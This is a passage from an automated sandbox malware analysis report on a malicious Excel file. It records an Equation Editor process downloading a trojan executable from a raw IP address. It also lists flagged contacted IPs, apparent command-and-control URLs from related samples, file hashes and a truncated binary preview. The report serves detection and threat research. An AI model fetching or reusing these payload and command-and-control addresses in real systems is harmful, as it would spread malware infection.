                                                                                                                          http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://twitter.com/statuses/user_timeline.xml?screen_name=vbc.exe, vbc.exe, 00000006.00000000.2183745141.0000000000272000.00000020.00020000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://search.yahoo.co.jpexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://www.target.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://buscador.terra.es/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://search.orange.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://www.iask.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://www.tesco.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://cgi.search.biglobe.ne.jp/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://search.seznam.cz/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://suche.freenet.de/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://search.interpark.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://clients5.google.com/complete/search?hl=explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          http://investor.msn.com/explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://search.espn.go.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://www.myspace.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://search.centrum.cz/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://p.zhongsou.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  http://service2.bfast.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  199.59.242.153
                                                                                                                                                  		71822.bodis.comUnited States
                                                                                                                                                  		395082BODIS-NJUSfalse
                                                                                                                                                  3.121.113.175
                                                                                                                                                  		unknownUnited States
                                                                                                                                                  		16509AMAZON-02UStrue
                                                                                                                                                  151.101.0.119
                                                                                                                                                  		intoxickiss.comUnited States
                                                                                                                                                  		54113FASTLYUStrue

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                  Analysis ID:452641
                                                                                                                                                  Start date:22.07.2021
                                                                                                                                                  Start time:17:13:46
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 11m 47s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:Form BA.xlsx
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                  Number of analysed new started processes analysed:10
                                                                                                                                                  Number of new started drivers analysed:1
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.expl.evad.winXLSX@10/19@4/3
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 15.5% (good quality ratio 15%)
                                                                                                                                                  • Quality average: 75.9%
                                                                                                                                                  • Quality standard deviation: 26%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 74
                                                                                                                                                  • Number of non-executed functions: 63
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsx
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, conhost.exe, svchost.exe
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  17:15:03API Interceptor40x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                  17:15:04API Interceptor287x Sleep call for process: vbc.exe modified
                                                                                                                                                  17:15:54API Interceptor214x Sleep call for process: rundll32.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  199.59.242.153new order.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • www.globaltradeview.com/n84e/?YP=YB5mtasMUEHgcdBg3w1JzInb0sE5RwTjc/Tqop+T4aXdM6WeS8rV/Q3f3EZlzbjbZYjOJg==&m8ot=8pa4DPp09N0DbNR0
                                                                                                                                                  PO_2005042020.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.funif.icu/dt9v/?WJBxWP=/dNyVkAccEq0OhJt4Ytz8g7S8Q6mx9qNCmyMDejIdoAPysAyB6+9naP82D/jnnZeL5y1&tFQp=7nutZ
                                                                                                                                                  Swift.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.chicagolandjunkcarbuyer.com/thl4/?oTO=9XRvGPdd9OZjw66gJDqZc4Tbb4K4WVD9/14pVD3HzfT4/RgnF8iuNk1sdPo8LsHsBiNm&YTLLWz=6lgHDJPh
                                                                                                                                                  SWIFT MT103.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.gor.xyz/gscc/?g2JpWVKx=45WLw/qHVVUFgrjwGZOJHGiR4I/cQSQnF8oHOeXkYfHHiqRoy/0ZD/TpSUhrjbztz6x+QlAMnQ==&i48dF=AHEdxvQpNPBdxT6p
                                                                                                                                                  RFQ-Order contract requirements.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.gor.xyz/gscc/?PB6pE=45WLw/qHVVUFgrjwGZOJHGiR4I/cQSQnF8oHOeXkYfHHiqRoy/0ZD/TpSUhS8qTu9st5QlAL0g==&l4=8potZVWpGZZ
                                                                                                                                                  hGpEbxogJ3.msiGet hashmaliciousBrowse
                                                                                                                                                  • www.chicagolandjunkcarbuyer.com/thl4/?VJBxa=6l9pDXLHZLZt8&sZyTH=9XRvGPdd9OZjw66gJDqZc4Tbb4K4WVD9/14pVD3HzfT4/RgnF8iuNk1sdMIsENXUfHkh
                                                                                                                                                  Fra8994.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.hitbars.space/q3t0/?_6F=+3dTbzfZs6MxWUk0s5DG9DSasbGeOcbq1TMJ6iU03rkZ0Vw53zLFflffW1vOU7AfPTuy&6l=CXf4ZT4
                                                                                                                                                  Statement for MCF and SSL890935672002937383920028202.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.hullyc.com/3b4e/?qPtlS=BR-TqN&7nh=4ePaE0hXFCcoXxwZO8an49njM/FSx2KIc8Ta6ac5S7lyJ0MkFWvwf74A2m12MQKM4anz
                                                                                                                                                  INVOICE E-4137 REV.1 AND E-4136 REV.1.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.cleaner-solar.com/u9pi/?4hNHZPS8=4OyfnYx74NgWtXxZ7Rjofv7BR5c/IYUL06mPXh1Fccw5xmvA4OPZgb7qUWOtnmXbMvoo&op7=ob08qfOhk
                                                                                                                                                  Img-347654566091235.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.hitbars.space/q3t0/?q6A=+3dTbzfZs6MxWUk0s5DG9DSasbGeOcbq1TMJ6iU03rkZ0Vw53zLFflffW2P0EqgnV0P1&5j=6lULKpmp0J0
                                                                                                                                                  LEMO.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.booster.guru/aipc/?f6A8Sz=BMi4rIX3OaRmAVdWmHwDy158GXvJowW6rsMkLX8T/SeurUfZZjefoMGqIKxJ2f9Kzzfm&sDKp4l=3fHXUDz8CN-
                                                                                                                                                  vbc.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.gettollingagain.com/lth/?QPi=R0ZjXo5eb12AQfL2mJSQ4Pke5FoJc2BIBKrjfE0luvFwR4nyycvvY6a4I3dzSm6JElVt&EN=z2JTn6-hWBQxkJMP
                                                                                                                                                  0m445A5H66.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.wwwmacsports.com/nff/?E6Ap=0DK8_4-Xijpdzt&fZzpL=m9tMrdH5s5McIQQpiSGs8SInYxUL4H2IAxrYgc1ZIVpX4WbHn5hGWqowwb7fTo8LB/Xn
                                                                                                                                                  sample17.exeGet hashmaliciousBrowse
                                                                                                                                                  • ww1.blm35.net/
                                                                                                                                                  444890321.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.oklahomasundayschool.com/ccr/?FJB=AxjKtjbRfNJtNPnejOfQjb3R2KRHRMY2w4U1+yq2aSZlRtrxzdj5Yr2imIB9O7nqKvHd&v0=JDK8Zp
                                                                                                                                                  2435.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.northsytyle.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W
                                                                                                                                                  ] New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.greenshirecommons.com/un8c/?8p=mBlnh5cldNPXtcmrZbSjCDRuhUw9cugXgXVTMTkNCQGRZTLNWcZvUlnJwuwR4xQFHfof&h6Z=FZOTUTGPt4-
                                                                                                                                                  fD56g4DRzG.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.frontpagesweb.net/w88t/?1bWl=DwAbJomwIIUam/8Lxif0xJyCLP0/MlDCQn/X6EWMKnqqCjXzJeuBHxh9ROI30kSy7fCE&z6z=STRxNL2x
                                                                                                                                                  malware300.docmGet hashmaliciousBrowse
                                                                                                                                                  • ww25.gokeenakte.top/admin.php?f=1&subid1=20210605-2000-3553-b2c5-4eab817b0105
                                                                                                                                                  Payment.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.digitalgamerentals.com/ngvm/?3fl00=eXBfF5JabAMvoJeV+Y5ra8EK8SdWvzGjXwXzLVFQuPc9hZ/16jkYHGAZEYy2Tm7CaklT&9rdLfJ=i48HtpdXmp

                                                                                                                                                  Domains

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  71822.bodis.comSWIFT MT103.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  RFQ-Order contract requirements.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  LEMO.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  henry.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  porosi e re Fature Proforma.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Remittance Advice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  RFQ-14042021 Guangzhou Haotian Equipment Technology Co., Ltd,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Revised Signed Proforma Invoice 000856453553.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  payment proof.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  SWIFT COPY_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  winlog.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  NEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Order List - 022321-xlxs.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  FHT210995.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  099898892.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  SOA121520.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  udtiZ6qM4s.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  camscanner-011022020.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Se adjunta un nuevo pedido.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  payment copy pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153

                                                                                                                                                  ASN

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  BODIS-NJUSnew order.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  PO_2005042020.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Swift.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  SWIFT MT103.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  RFQ-Order contract requirements.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  hGpEbxogJ3.msiGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Fra8994.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Statement for MCF and SSL890935672002937383920028202.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  INVOICE E-4137 REV.1 AND E-4136 REV.1.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Img-347654566091235.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  LEMO.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  vbc.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  0m445A5H66.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  sample17.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  444890321.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  2435.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  ] New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  fD56g4DRzG.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  malware300.docmGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Payment.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exe
                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:downloaded
                                                                                                                                                  Size (bytes):713216
                                                                                                                                                  Entropy (8bit):7.571021299706813
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:BUEnk8yfaR+DaY3bsojKdqFyirJ5Y1oDpgAwUzl3XoJPcISRqzGWl06bsyaUVKnp:KEnkZCR+ZjKYjrw1o1H73XwPcIll/bz6
                                                                                                                                                  MD5:734A568749C7879E5CA5EA2B8E082F5E
                                                                                                                                                  SHA1:27D6276E49602F3633DFDD94DE400DB53E209B51
                                                                                                                                                  SHA-256:D0F6F28C586B78DFBC7D4E6C277C20761C9DB38E0CD059807BE5252B52D10660
                                                                                                                                                  SHA-512:012E2122B51055DD011341E629890F3D7B9D3D8CE6984D62EDD287C625634C01B5FB7D220002C79D5E53EBF089FEE5C505B48FDCBE89951BEB36D0A92E9B96E0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Reputation:low
                                                                                                                                                  IE Cache URL:http://3.121.113.175/www/pool.exe
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.................. ........@.. .......................@............@.................................|...O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........p...........L...0)...........................................0............( ...(!.........(.....o"....*.....................(#......($......(%......(&......('....*N..(....oE...((....*&..()....*.s*........s+........s,........s-........s.........*....0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0...........~....o3....+..*.0..<........~.....(4.....,!r...p.....(5...o6...s7............~.....+..*.0......
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\538D84B1.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):62140
                                                                                                                                                  Entropy (8bit):7.529847875703774
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                  MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                  SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                  SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                  SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5CD4C46B.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):94963
                                                                                                                                                  Entropy (8bit):7.9700481154985985
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                  MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                  SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                  SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                  SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\965742FE.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11303
                                                                                                                                                  Entropy (8bit):7.909402464702408
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BFF9592.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11303
                                                                                                                                                  Entropy (8bit):7.909402464702408
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A3F7F095.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):62140
                                                                                                                                                  Entropy (8bit):7.529847875703774
                                                                                                                                                  Encrypted:false
